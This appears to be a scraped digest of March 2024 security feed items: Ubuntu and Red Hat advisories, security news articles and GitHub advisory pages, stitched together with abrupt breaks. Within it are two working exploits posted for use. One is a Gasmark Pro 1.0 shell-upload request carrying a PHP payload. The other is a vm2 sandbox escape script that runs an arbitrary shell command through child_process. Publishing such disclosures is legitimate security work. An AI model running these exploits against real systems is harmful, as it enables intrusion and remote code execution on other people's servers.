Ubuntu Security Notice 6696-1 - Yi Yang discovered that the Hotspot component of OpenJDK 8 incorrectly handled array accesses in the C1 compiler. An attacker could possibly use this issue to cause a denial of service, execute arbitrary code or bypass Java sandbox restrictions. It was discovered that the Hotspot component of OpenJDK 8 did not properly verify bytecode in certain situations. An attacker could possibly use this issue to bypass Java sandbox restrictions.

==========================================================================  
Ubuntu Security Notice USN-6696-1  
March 18, 2024

openjdk-8 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in OpenJDK 8.

Software Description:  
- openjdk-8: Open Source Java implementation

Details:

Yi Yang discovered that the Hotspot component of OpenJDK 8 incorrectly  
handled array accesses in the C1 compiler. An attacker could possibly  
use this issue to cause a denial of service, execute arbitrary code or  
bypass Java sandbox restrictions. (CVE-2024-20918)

It was discovered that the Hotspot component of OpenJDK 8 did not  
properly verify bytecode in certain situations. An attacker could  
possibly use this issue to bypass Java sandbox restrictions.  
(CVE-2024-20919)

It was discovered that the Hotspot component of OpenJDK 8 had an  
optimization flaw when generating range check loop predicates. An attacker  
could possibly use this issue to cause a denial of service, execute  
arbitrary code or bypass Java sandbox restrictions. (CVE-2024-20921)

Valentin Eudeline discovered that OpenJDK 8 incorrectly handled certain  
options in the Nashorn JavaScript subcomponent. An attacker could  
possibly use this issue to execute arbitrary code. (CVE-2024-20926)

It was discovered that OpenJDK 8 could produce debug logs that contained  
private keys used for digital signatures. An attacker could possibly use  
this issue to obtain sensitive information. (CVE-2024-20945)

Hubert Kario discovered that the TLS implementation in OpenJDK 8 had a  
timing side-channel and incorrectly handled RSA padding. A remote attacker  
could possibly use this issue to recover sensitive information.  
(CVE-2024-20952)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jre                   8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~23.10.1

Ubuntu 22.04 LTS:  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~22.04  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~22.04  
   openjdk-8-jre                   8u402-ga-2ubuntu1~22.04  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~22.04  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~22.04

Ubuntu 20.04 LTS:  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~20.04  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~20.04  
   openjdk-8-jre                   8u402-ga-2ubuntu1~20.04  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~20.04  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~20.04

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~18.04  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~18.04  
   openjdk-8-jre                   8u402-ga-2ubuntu1~18.04  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~18.04  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~18.04

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart any Java  
applications to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6696-1  
   CVE-2024-20918, CVE-2024-20919, CVE-2024-20921, CVE-2024-20926,  
   CVE-2024-20945, CVE-2024-20952

Package Information:  
   https://launchpad.net/ubuntu/+source/openjdk-8/8u402-ga-2ubuntu1~23.10.1  
   https://launchpad.net/ubuntu/+source/openjdk-8/8u402-ga-2ubuntu1~22.04  
   https://launchpad.net/ubuntu/+source/openjdk-8/8u402-ga-2ubuntu1~20.04

Ubuntu Security Notice USN-6696-1

Red Hat Security Advisory 2024-1346-03 - An update is now available for Red Hat OpenShift GitOps 1.11. Issues addressed include a cross site scripting vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1346.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift GitOps security update  
Advisory ID:        RHSA-2024:1346-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1346  
Issue date:         2024-03-16  
Revision:           03  
CVE Names:          CVE-2024-28175  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps 1.11.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.

Security Fix(es):

* Before this update, due to the improper filtering of URL protocols in the Argo CD application summary component, an attacker could achieve cross-site scripting with permission to edit the application. This update fixes the issue by upgrading the Argo CD version to v2.9.8 which has the fix applied and is therefore not vulnerable (CVE-2024-28175).

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-28175

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.11/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2268518

Red Hat Security Advisory 2024-1346-03

Red Hat Security Advisory 2024-1345-03 - An update is now available for Red Hat OpenShift GitOps 1.10. Issues addressed include a cross site scripting vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1345.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift GitOps security update  
Advisory ID:        RHSA-2024:1345-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1345  
Issue date:         2024-03-15  
Revision:           03  
CVE Names:          CVE-2024-28175  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps 1.10.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.

Security Fix(es):

* Before this update, due to the improper filtering of URL protocols in the Argo CD application summary component, an attacker could achieve cross-site scripting with permission to edit the application. This update fixes the issue by upgrading the Argo CD version to v2.8.12 which has the fix applied and is therefore not vulnerable (CVE-2024-28175)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-28175

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.10/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2268518

Red Hat Security Advisory 2024-1345-03

Gasmark Pro version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: GASMARK PRO-1.0 File Upload RCE## Author: nu11secur1ty## Date: 03/17/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/## Description:Vulnerable input:`<input type="file" class="form-control" id="productImage"name="productImage" style="width:auto;">`This application suffers from shell upload and remote code executionvulnerability, the attacker easilycan destroy this system, when he has credentials.STATUS: HIGH- Vulnerability CRITICAL[+]Exploit:```PHPPOST /gasmark/gasmark/php_action/createclient.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=1afinf22p9snl2nai24g29duucContent-Length: 1063Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/gasmark/gasmark/add_client.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="currnt_date"------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="name"pwned------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="gender"Female------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="mob_no"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="reffering"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="address"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"Content-Type: application/octet-stream<?php// by nu11secur1ty - 2023$fh = fopen('test.html', 'a');fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');fclose($fh);//nlink('test.html');?>------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="create"------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)## Time spent:00:25:00

Gasmark Pro 1.0 Shell Upload

vm2 versions 3.9.19 and below suffer from a sandbox escape vulnerability.

    /*# Exploit Title: vm2 Sandbox Escape vulnerability# Date: 23/12/2023# Exploit Author: Calil Khalil & Adriel Mc Roberts# Vendor Homepage: https://github.com/patriksimek/vm2# Software Link: https://github.com/patriksimek/vm2# Version: vm2 <= 3.9.19# Tested on: Ubuntu 22.04# CVE : CVE-2023-37466*/const { VM } = require("vm2");const vm = new VM();const command = 'pwd'; // Change to the desired commandconst code = `async function fn() {    (function stack() {        new Error().stack;        stack();    })();}try {    const handler = {        getPrototypeOf(target) {            (function stack() {                new Error().stack;                stack();            })();        }    };    const proxiedErr = new Proxy({}, handler);    throw proxiedErr;} catch ({ constructor: c }) {    const childProcess = c.constructor('return process')().mainModule.require('child_process');    childProcess.execSync('${command}');}`;console.log(vm.run(code));

vm2 3.9.19 Sandbox Escape

By Waqas
Cyber Warfare Takes Flight: Geopolitics Fuel Attacks on Airlines - Dark Web Tool Aims at E-commerce!
This is a post from HackRead.com Read the original post: Dark Web Tool Arms Ransomware Gangs: E-commerce & Aviation Industries Targeted

Cybersecurity researchers have published two concerning reports where the first report highlights the surge in cyber attacks against the aviation and aerospace industries – And the second report exposes a dark web tool called TMChecker fueling attacks against E-commerce platforms.

Recent cyber incidents targeting the aerospace and aviation sectors have raised concerns about the industry’s vulnerability to malicious attacks, according to a report by Resecurity. The report highlights the critical need for strong cybersecurity risk assessments to protect airports and aviation infrastructure.

The aerospace sector, including the design, manufacturing, and maintenance of aircraft and spacecraft, has become a prime target for cyberattacks due to its reliance on interconnected digital infrastructures and global supply chains.

The integration of Industrial Internet of Things (IIoT) technologies has further strengthened this threat, making aerospace organizations more vulnerable and susceptible to cyber attacks.

Credit: Resecurity

****Ransomware Attacks & The Aviation Industry****

Ransomware emerges as a top threat facing the aviation industry, with a 600% increase in occurrences reported by Boeing Chief Security Officer Richard Puckett at the 2023 Aviation Week MRO Americas Conference.

The European Organisation for the Safety of Air Navigation (Eurocontrol) also highlighted ransomware as the sector’s leading attack trend in 2022, accounting for 22% of all malicious incidents. Some of the examples highlighted in the report include the LockBit ransomware gang’s attack on Boeing in November 2023, which the aviation giant later confirmed.

****Geopolitical tensions & The Aviation Industry****

According to Resecurity’s blog post titled “The Aviation And Aerospace Sectors Face Skyrocketing Cyber Threats,” geopolitical tensions and the designation of aerospace and aviation as critical infrastructure by the U.S. government have fueled cyberattacks targeting the industry.

Threat actors, including hacktivist collectives, are increasingly targeting aviation organizations to advance political agendas or disrupt operations. One such example is the hacktivist group Anonymous Sudan which targeted FlyDubai, an Emirati government-owned airline in Dubai, United Arab Emirates in February 2024 citing the company’s alleged support to the Rapid Support Forces (RSF) in Sudan.

Other recent cyberattacks targeting the aerospace sector include Distributed Denial of Service (DDoS) attacks by groups such as Mysterious Team Bangladesh (MTB) against Saudi Arabian airports and ALTOUFAN TEAM against Gulf Air.

> In stand with our steadfast Palestinian people in Gaza Strip in their brave and honorable resistance,ALTOUFAN TEAM targets companies normalized with the Zionist entity , Bahrain International Airport and the Bahraini national carrier “Gulf Air” servers and website…… pic.twitter.com/OKOhR12M3S
> 
> — ALTOUFAN TEAM (@altoufanteam) November 22, 2023

Additional incidents involve ransomware attacks on airlines like Air Albania and Continental Aerospace Technologies, compromising critical data and disrupting operations.

**T**MChecker – Dark Web Tool Targeting Remote Access and E-Commerce Platforms****

In another report published on March 13, 2024, Resecurity detailed a new cybersecurity threat named TMChecker that has surfaced on the Dark Web, posing a notable risk to remote-access services and popular e-commerce applications.

Developed by an actor known as “M762” on the Russian language XSS cybercrime forum, TMChecker is a sophisticated tool that combines corporate access login (log) checking capabilities with a brute-force attack kit. Available for a monthly subscription fee of $200, TMChecker has garnered attention for its ability to target a wide range of VPN gateways, email servers, and e-commerce platforms.

Credit: Resecurity

TMChecker stands out from similar tools like ParanoidChecker due to its focus on corporate remote access gateways, which are often primary targets for ransomware attacks and other malicious activities. The tool supports 17 solutions, including Cisco VPN, Citrix VPN, Office 365, WordPress, Magento, and cPanel, among others, making it a versatile and powerful weapon.

Cybercriminals exploit TMChecker to identify compromised data containing valid credentials for corporate VPN and email accounts. In one observed incident, threat actors used TMChecker to target the email server of a government organization in Ecuador, demonstrating the tool’s real-world impact.

M762 operates a Telegram channel with over 3,270 subscribers, potentially indicating a sizable user base for TMChecker. The addition of such tools aligns with a concerning trend highlighted in recent Microsoft research, which noted a significant increase in human-operated ransomware attacks.

These attacks often involve the abuse of remote monitoring and management tools, leaving behind less evidence compared to automated attacks delivered through malicious documents.

As TMChecker and similar tools lower the barriers to obtaining remote access credentials, the risk of destructive ransomware attacks and other malicious campaigns amplifies. This threat is particularly acute in the context of mergers and acquisitions, where cybercriminals target vulnerable organizations to exploit for financial gain.

1.  Cl0p ransomware gang hits Aviation giant Bombardier
2.  Hackers Uncover Airbus EFB App Flaws, Risking Aircraft Data
3.  Israeli: Hackers Targeted EL AL Flights in Mid-Air Hijack Attempt
4.  Military Satellite Access Sold on Russian Hacker Forum for $15,000
5.  Hackers posing as LinkedIn recruiters to scam military, aerospace firms

Dark Web Tool Arms Ransomware Gangs: E-commerce & Aviation Industries Targeted

Plus: The operator of a dark-web cryptocurrency “mixing” service is found guilty, and a US senator reveals that popular safes contain secret backdoors.

How do you know the internet has a deepfake porn problem? Just look at copyright takedown requests. WIRED found this week that Google is receiving thousands of Digital Millennium Copyright Act complaints for deepfake nudes, most of which are published by just a handful of websites. Experts say the deluge of DMCA takedown requests is evidence that Google should delist the offending sites from search. In Texas, meanwhile, a federal court upheld the state’s age-verification requirements for porn sites, which could lead to even more lawsuits.

In a win for privacy advocates, Airbnb announced on Monday that it will ban the use of indoor security cameras at short-term rental properties around the world. The ban extends to outdoor areas where there is a “greater expectation of privacy,” such as saunas or outdoor showers. The company has long banned the use of hidden cameras and required hosts to tell guests where it has security cameras installed. Hosts who violate the security cam ban could have their properties removed from Airbnb.

Cryptocurrency firm Binance’s troubles have gone from bad to downright scary. Two of the company's executives—Tigran Gambaryan, a former financial crimes investigator for the IRS, and UK-based government affairs specialist Nadeem Anjarwalla, have been held for weeks by Nigeria’s government amid its broader crackdown on cryptocurrency. Neither man has been charged with any crime, and their families are asking the US and UK governments for help securing their release.

In case you’re wondering: No, the US government isn’t hiding evidence of aliens, according to a new Pentagon report. But it sure seems to be hiding _something_, raising more questions about what’s out there if that thing isn’t UFOs. Elsewhere in the world of government secrets, the US House Intelligence Committee chair recently held a closed-door meeting in which he urged lawmakers to block privacy reforms to a major US surveillance program by citing how it could be used to surveil US-based protesters, further raising civil liberties concerns. Congress’ efforts to renew that program, known as Section 702, remain ongoing.

Donald Trump this week earned enough delegates in the 2024 Republican primary to officially win the party’s nomination. If Trump does win another term in the White House, experts fear he could use a slate of “emergency powers” to carry out an authoritarian agenda—and there’s little the other branches of government could do to stop him.

Finally, reporters at _Der Spiegel_, Recorder, _The_ _Washington Post_, and WIRED collaborated on an investigation into a global network of violent predators who use major platforms like Discord, Telegram, and even Roblox to target children and extort them into committing horrific acts of abuse—or worse.

And that’s not all. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Insurance companies have long offered discounts to drivers who'll carry GPS devices or download smartphone apps that track their driving habits. But when wary drivers refuse, insurers find other ways of monitoring their driving. Data brokers like LexisNexus are buying people's car data directly from manufacturers, such as General Motors, which are making a killing by selling it off. This data is then used to create “risk” scores for individual drivers, which insurance providers use to set premiums. The businesses claim the data-sharing is consensual, but most drivers have no idea what's happening. Drivers whose risk scores are shared with insurance providers often see their monthly insurance payments skyrocket.

**The Bitcoin Fog Case Ends in a Guilty Verdict**

The operator of a darknet cryptocurrency “mixing” service called Bitcoin Fog faces a maximum of 20 years in prison after his conviction this week by a federal jury in Washington, DC. Roman Sterlingov, 35, ran Bitcoin Fog between 2011 and 2021, moving roughly $400 million worth of currency, much of which, prosecutors say, was tied to narcotics, identity theft, and cybercrime. Sterlingov had denied founding Bitcoin Fog in interviews with WIRED; however, the US Justice Department countered that claim in court with blockchain analysis and a trial of financial paperwork.

**Popular Safes Contain Secret Backdoors**

Two commercial safe makers have been called out for installing backdoors in their safes, according to a letter by Ron Wyden, a US senator from Oregon. The reset codes are one reason the Department of Defense has banned the safes from being used inside the US government. Knowledge of the codes, which Wyden says leaves consumers vulnerable to criminals and spies, was made public through a letter he wrote to the National Counterintelligence and Security Center. In it, he asks the agency to issue an alert, warning Americans about the risks posed by the safes.

Automakers Are Telling Your Insurance Company How You Really Drive

Cybersecurity researchers have found a number of GitHub repositories offering cracked software that are used to deliver an information stealer called RisePro.
The campaign, codenamed gitgub, includes 17 repositories associated with 11 different accounts, according to G DATA. The repositories in question have since been taken down by the Microsoft-owned subsidiary.
"The repositories look

Hackers Using Cracked Software on GitHub to Spread RisePro Info Stealer

djangorestframework-simplejwt version 5.3.1 and before is vulnerable to information disclosure. A user can access web application resources even after their account has been disabled due to missing user validation checks via the for_user method.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-22513

**Improper Privilege Management in djangorestframework-simplejwt**

Moderate severity GitHub Reviewed Published Mar 16, 2024 to the GitHub Advisory Database • Updated Mar 18, 2024

**Package**

pip djangorestframework-simplejwt (pip)

**Affected versions**

<= 5.3.1

**Description**

Published to the GitHub Advisory Database

Mar 16, 2024

Last updated

Mar 18, 2024

GHSA-5vcc-86wm-547q: Improper Privilege Management in djangorestframework-simplejwt

Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a  open redirect https://cwe.mitre.org/data/definitions/601.html  attack or to a SSRF attack if the URL is used after passing validation checks.

This is the same as  CVE-2024-22243 https://spring.io/security/cve-2024-22243, but with different input.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-22259

**Spring Framework URL Parsing with Host Validation Vulnerability**

High severity GitHub Reviewed Published Mar 16, 2024 to the GitHub Advisory Database • Updated Mar 18, 2024

**Package**

maven org.springframework:spring-web (Maven)

**Affected versions**

\>= 6.1.0, < 6.1.5

\>= 6.0.0, < 6.0.18

< 5.3.33

**Patched versions**

6.1.5

6.0.18

5.3.33

**Description**

Published to the GitHub Advisory Database

Mar 16, 2024

Last updated

Mar 18, 2024

Tag

#git